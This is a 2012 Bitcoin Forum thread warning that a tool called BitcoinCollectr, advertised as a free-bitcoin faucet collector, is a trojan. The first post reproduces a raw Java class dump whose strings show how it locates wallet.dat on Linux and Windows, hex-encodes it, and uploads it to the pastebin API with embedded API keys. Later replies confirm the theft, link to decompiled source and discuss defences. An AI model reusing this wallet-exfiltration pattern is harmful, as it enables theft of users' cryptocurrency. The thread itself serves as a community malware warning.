Bitcoin Forum
March 25, 2017, 07:49:30 PM *
News: Latest stable version of Bitcoin Core: 0.14.0  [Torrent]. (New!)
 
   Home   Help Search Donate Login Register  
Pages: [1]
  Print  
Author Topic: trojan warning "BITCOINCOLLECTR"  (Read 1895 times)
hamdi
Hero Member
*****
Offline Offline

Activity: 644



View Profile
May 24, 2012, 03:42:31 PM
 #1

WARNING! this tool tries to steal your wallet.dat!!!


this guy ( https://bitcointalk.org/index.php?action=profile;u=57949 ) tries to lure people into using this tool via his signature right now!!

http://[wallet stealer].bt.ohost.de/

Quote
BitcoinCollectr

beta

What is it?

BitcoinCollectr is a little project i'm working on at the moment. It makes use of websites that offer free bitcoins and automatically collects them for you.

Where can I get it?

Download here. Consider that it's still beta and probably buggy. Please report bugs to me.

Contact

yus0r@tormail.org

Donation

I know, it's not worth donating for, but if you insist: 1EZWAuXu3vfHTtBcLuEsht7q1d8Ab7dDPX


Code:
CA\FE\BA\BE\00\00\002v\00\00Main\00\00java/lang/Object\00<init>\00()V\00Code
\00\00 \00\00\00LineNumberTable\00LocalVariableTable\00this\00LMain;\00main\00([Ljava/lang/String;)V\00\00FreeBitcoinService
\00\00 \00\00Bitcoin Faucet \00\00 \00\00\00name\00Ljava/lang/String;\00\00http://freebitcoins.appspot.com \00\00 \00\00\00url?tz\E1G\AE{ \00\00! \00"\00#\00 btcAmount\00D\00%\00Daily Bitcoins\00'\00http://Daily Bitcoins?@bM\D2\F1\A9\FC\00+\00CoinAd\00-\00https://coinad.com/?h\93t\BCj~\FA\001\00Bitcoin Dispenser\003\00http://dispenser.bitbank.me/?PbM\D2\F1\A9\FC\007\00BitCrate\009\00http://http://www.bitcrate.net/?\94z\E1G\AE{\00=\00mycryptcoin.com\00?\00http://mycryptcoin.com/?`bM\D2\F1\A9\FC\00C\00 BitcoinBetas\00E\00http://www.bitcoinbetas.com?\A9\99\99\99\99\99\9A\00I\00java/util/ArrayList
\00H\00 \00L\00N\00M\00java/util/List \00O\00P\00add\00(Ljava/lang/Object;)Z?\ECz\E1G\AE{ \00L\00T \00U\00V\00iterator\00()Ljava/util/Iterator; \00X\00Z\00Y\00java/util/Iterator \00[\00\\00next\00()Ljava/lang/Object;?\F3333333 \00X\00` \00a\00b\00hasNext\00()Z\00d\00>..............................................................
\00\00f \00g\00h\00o\00(Ljava/lang/String;)V\00j\00>: BitcoinCollectr 0.8 beta                          5/13/12  :\00l\00>:                                                            :\00n\00>: Author: Yus0r (yus0r@tormail.org)                          :\00p\00\00\00r\00: Looking for updates..\00t\00http://[wallet stealer].bt.ohost.de
\00v\00x\00w\00Util \00y\00z\00getHTML\00&(Ljava/lang/String;)Ljava/lang/String;
\00\00| \00}\00~\00getWalletFileName\00()Ljava/lang/String;\00\80\00 java/io/File
\00\00\82 \00\00h
\00\00\84 \00\85\00\86\00getBytesFromFile\00(Ljava/io/File;)[B
\00v\00\88 \00\89\00\8A\00asHex\00([B)Ljava/lang/String;
\00\00\8C \00\8D\00h\00sendPost\00\8F\00: no updates available.\00\91\00java/lang/StringBuilder\00\93\00
: Supporting
\00\90\00\82 \00L\00\96 \00\97\00\98\00size\00()I
\00\90\00\9A \00\9B\00\9C\00append\00(I)Ljava/lang/StringBuilder;\00\9E\00! free bitcoin collector websites.
\00\90\00\A0 \00\9B\00\A1\00-(Ljava/lang/String;)Ljava/lang/StringBuilder;
\00\90\00\A3 \00\A4\00~\00toString\00\A6\00: Max. possible profit @\00\00\00\00\00\00\00
\00\90\00\AA \00\9B\00\AB\00(D)Ljava/lang/StringBuilder;\00\AD\00 BTC.\00\AF\00*: Enter receiving address and press ENTER:\00\B1\00java/io/BufferedReader\00\B3\00java/io/InputStreamReader \00\B5\00\B7\00\B6\00java/lang/System \00\B8\00\B9\00in\00Ljava/io/InputStream;
\00\B2\00\BB \00\00\BC\00(Ljava/io/InputStream;)V
\00\B0\00\BE \00\00\BF\00(Ljava/io/Reader;)V
\00\B0\00\C1 \00\C2\00~\00readLine\00\C4\00 : Starting..\00\C6\00: Processing <\00\C8\00>....\00\CA\00java/net/ConnectException
\00\C9\00\82
\00\CD\00\CF\00\CE\00java/lang/Exception \00\D0\00\00printStackTrace
\00\D2\00\CF\00\D3\00java/io/IOException\00args\00[Ljava/lang/String;\00f1\00LFreeBitcoinService;\00f2\00f3\00f4\00f5\00f6\00f7\00services\00Ljava/util/List;\00max\00s\00filename\00bytes\00[B\00hex\00Ljava/io/BufferedReader;\00address\00e\00Ljava/lang/Exception;\00e1\00Ljava/io/IOException;\00LocalVariableTypeTable\00&Ljava/util/List<LFreeBitcoinService;>;\00
StackMapTable\00\D5\00\F1\00java/lang/String\00
Exceptions\00\F4\00java/net/UnknownHostException\00\F6\00 api_dev_key\00\F8\00UTF-8
\00\FA\00\FC\00\FB\00java/net/URLEncoder \00\FD\00\FE\00encode\008(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
\00\F0\00 \00valueOf\00&(Ljava/lang/Object;)Ljava/lang/String;\00=\00 562298eb26ccc3719f7fa178f8b7fef4\00&
\00
api_option \00paste\00 api_user_key\00api_paste_code\00"baedd069b2f6e0948a80c7a8f3daf052: \00 java/net/URL\00$http://pastebin.com/api/api_post.php
\00\82
 \00openConnection\00()Ljava/net/URLConnection;
\00java/net/URLConnection  !\00 setDoOutput\00(Z)V#\00java/io/OutputStreamWriter
% &'\00getOutputStream\00()Ljava/io/OutputStream;
") \00*\00(Ljava/io/OutputStream;)V
", -\00h\00write
"/ 0\00\00flush
2 34\00getInputStream\00()Ljava/io/InputStream;
"6 7\00\00close
\00\B06\00content\00data\00Ljava/net/URL;\00conn\00Ljava/net/URLConnection;\00wr\00Ljava/io/OutputStreamWriter;\00rd\00lineC\00os.name
\00\B5E F\00z\00 getPropertyH\00Linux
\00\F0J KL\00contains\00(Ljava/lang/CharSequence;)ZN\00 user.homeP\00/.bitcoin/wallet.datR\00APPDATA
\00\B5T U\00z\00getenvW\00\Bitcoin\wallet.dat\00osnameZ\00java/io/FileInputStream
Y\ \00]\00(Ljava/io/File;)V
\00_ `a\00length\00()J
Yc de\00read\00([B)I
Y6\00file\00Ljava/io/File;\00fileInputStream\00Ljava/io/FileInputStream; \00\B5l mn\00out\00Ljava/io/PrintStream;
prq\00java/io/PrintStream s\00h\00println\00
SourceFile\00 Main.java

1490471370
Hero Member
*
Offline Offline

Posts: 1490471370

View Profile Personal Message (Offline)

Ignore
1490471370
Reply with quote  #2

1490471370
Report to moderator
1490471370
Hero Member
*
Offline Offline

Posts: 1490471370

View Profile Personal Message (Offline)

Ignore
1490471370
Reply with quote  #2

1490471370
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
rjk
Sr. Member
****
Offline Offline

Activity: 420


1ngldh


View Profile
May 24, 2012, 03:47:25 PM
 #2

Please break your links so that they do not get indexed and flagged.

Mining Rig Extraordinaire - the Trenton BPX6806 18-slot PCIe backplane [PICS] Dead project is dead, all hail the coming of the mighty ASIC!
giszmo
Legendary
*
Offline Offline

Activity: 1568


¡ɥɔʇɐʍ ʇsnɾ &#7


View Profile WWW
May 24, 2012, 11:40:11 PM
 #3

not too eager to investigate the claims but if it's true, why is this thread so quiet?

vuce
Sr. Member
****
Offline Offline

Activity: 476


View Profile
May 25, 2012, 06:10:24 AM
 #4

Even if true I don't see this as such a problem anymore, pretty much everyone should have his wallet encrypted at this time...
drakahn
Hero Member
*****
Offline Offline

Activity: 504



View Profile
May 25, 2012, 06:18:10 AM
 #5

there is another one too that people have fallen for "neheminer" or something, claims to  be the fastest mining program but steals your wallet (and possibly changes btc addresses sent to clipboard, that may be a different trojan altogether though) 

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 

14ga8dJ6NGpiwQkNTXg7KzwozasfaXNfEU
vuce
Sr. Member
****
Offline Offline

Activity: 476


View Profile
May 25, 2012, 06:21:13 AM
 #6

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 
acl
drakahn
Hero Member
*****
Offline Offline

Activity: 504



View Profile
May 25, 2012, 06:24:02 AM
 #7

is there a way to monitor wallet.dat and stop any program from accessing it without some sort of user interaction? 
acl

i think i need to find a mirror to facepalm myself


14ga8dJ6NGpiwQkNTXg7KzwozasfaXNfEU
dizzy1
Full Member
***
Offline Offline

Activity: 134


View Profile
May 31, 2012, 01:14:43 AM
 #8

This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
rjk
Sr. Member
****
Offline Offline

Activity: 420


1ngldh


View Profile
May 31, 2012, 01:23:27 AM
 #9

This is a trojan. It reads the wallet.dat from the file level and pastes it to pastebin.com so if your wallet is encrypted you should be fine. Linked below is the decomplied source code.

http://freeter.me:81/BitcoinCollectr0.8beta.src.zip
Maybe if you send the pastebin-related source snippet to pastebin, maybe they can help identify the user based on the included dev and user API keys?

Mining Rig Extraordinaire - the Trenton BPX6806 18-slot PCIe backplane [PICS] Dead project is dead, all hail the coming of the mighty ASIC!
hamdi
Hero Member
*****
Offline Offline

Activity: 644



View Profile
June 07, 2012, 12:50:07 AM
 #10

the virus is pretty cool though

Pages: [1]
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!